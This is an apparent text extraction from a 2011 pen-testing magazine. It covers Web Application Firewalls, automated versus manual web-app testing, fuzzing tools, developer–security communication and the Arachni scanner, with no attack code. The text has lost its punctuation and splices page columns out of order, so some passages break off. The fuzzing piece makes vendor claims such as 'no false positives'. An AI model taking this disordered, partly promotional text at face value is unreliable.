If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
